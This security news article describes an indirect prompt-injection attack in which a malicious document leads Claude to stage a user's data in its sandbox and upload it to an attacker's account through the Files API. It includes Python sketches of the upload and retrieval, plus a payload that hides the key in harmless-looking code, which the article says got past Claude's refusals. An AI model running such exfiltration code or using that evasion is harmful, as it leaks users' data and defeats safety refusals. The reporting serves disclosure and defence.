Attackers can use indirect prompt injections to trick Anthropic’s AI model Claude into exfiltrating data that the user has access to, according to security researcher Johann Rehberger of Embrace The Red.
This attack exploits Claude’s Files API and is only possible if the AI model has network access, a feature enabled by default on certain plans that is intended to let Claude reach external resources such as code repositories or Anthropic APIs.
The Exfiltration Technique
The attack is relatively simple: an indirect prompt injection payload reads a user’s data and stores it in a file within Claude’s Code Interpreter sandbox. The malicious prompt then tricks the model into interacting with the Anthropic Files API using an API key provided by the attacker.
The code in the payload instructs Claude to upload the Code Interpreter file from the sandbox. However, because the attacker’s API key is used, the file is uploaded directly to the attacker’s account instead of the user’s. Rehberger noted that this technique allows an adversary to exfiltrate up to 30MB at once, and that attackers could upload multiple files.
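To make the mechanics concrete, here is a minimal sketch of that upload step, assuming the publicly documented Anthropic Files API beta endpoint and headers; the API key, file path, and filename are placeholders rather than values from Rehberger’s write-up.

```python
import requests

# Placeholders: in the real attack, the injected payload supplies the
# attacker's key and points at whatever file Claude wrote in the sandbox.
ATTACKER_API_KEY = "sk-ant-..."                    # attacker-controlled key
STOLEN_FILE = "/tmp/outputs/collected_data.txt"    # file staged in the sandbox

# Upload the staged file via the Anthropic Files API. Because the request
# authenticates with the attacker's key, the file lands in the attacker's
# account rather than the victim's.
with open(STOLEN_FILE, "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",  # Files API beta flag
        },
        files={"file": ("collected_data.txt", f)},
    )
resp.raise_for_status()
print(resp.json())  # metadata for the newly created file, including its ID
```

Nothing in the request ties the destination to the victim: whichever key authenticates the call determines which account receives the file.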
After the initial successful attempt, Claude began to refuse payloads, especially those with the API key in plain text. To overcome this, Rehberger had to blend the prompt injection with benign code to convince Claude that the request was not malicious.
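Rehberger has not published the exact payload, but the blending he describes could conceptually resemble the hypothetical fragment below, in which genuine-looking housekeeping code gives the script a plausible purpose and the key is assembled at runtime so it never appears in one piece.

```python
# Hypothetical illustration only, not Rehberger's actual payload.
key_parts = ["sk-ant", "-api03", "-REMAINDER"]  # placeholder fragments
api_key = "".join(key_parts)  # key never appears in plain text

def count_report_lines(path: str) -> int:
    """Benign helper that lends the script a legitimate-looking purpose."""
    with open(path) as f:
        return len(f.readlines())

print(count_report_lines("/tmp/outputs/report.txt"))  # the 'benign' half
# ...the upload step from the previous sketch would follow, using api_key.
```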
Attack Initiation and Impact
The attack starts when a user loads a malicious document received from the attacker into Claude for analysis. The exploit code hijacks the model, which then follows the attacker’s instructions to harvest the user’s data, save it to the sandbox, and call the Anthropic Files API to transmit it.
The researcher confirmed that the attack can be used to exfiltrate the user’s chat conversations, which Claude saves using its newly introduced "memories" feature. The attacker can then access the exfiltrated file from their own console.
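On the retrieval side, the sketch below shows how an attacker might enumerate their own account to locate the stolen upload. It assumes the Files API’s documented list endpoint and response fields; the key is again a placeholder.

```python
import requests

ATTACKER_API_KEY = "sk-ant-..."  # placeholder for the attacker's own key

# List files in the attacker's account; the exfiltrated upload appears here
# because it was created under the attacker's key, not the victim's.
resp = requests.get(
    "https://api.anthropic.com/v1/files",
    headers={
        "x-api-key": ATTACKER_API_KEY,
        "anthropic-version": "2023-06-01",
        "anthropic-beta": "files-api-2025-04-14",
    },
)
resp.raise_for_status()
for item in resp.json().get("data", []):
    print(item.get("id"), item.get("filename"), item.get("size_bytes"))
```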
Rehberger initially disclosed the attack to Anthropic via HackerOne, but the report was closed because the issue was categorized as a model safety concern, not a security vulnerability. However, after the researcher published information on the attack, Anthropic reversed course and notified Rehberger that the data exfiltration method is indeed in scope for security reporting.
Anthropic’s documentation underlines the risks associated with granting Claude network access and warns that attacks carried out via external files or websites could lead to code execution and information leaks. The documentation also provides recommended mitigations against such attacks.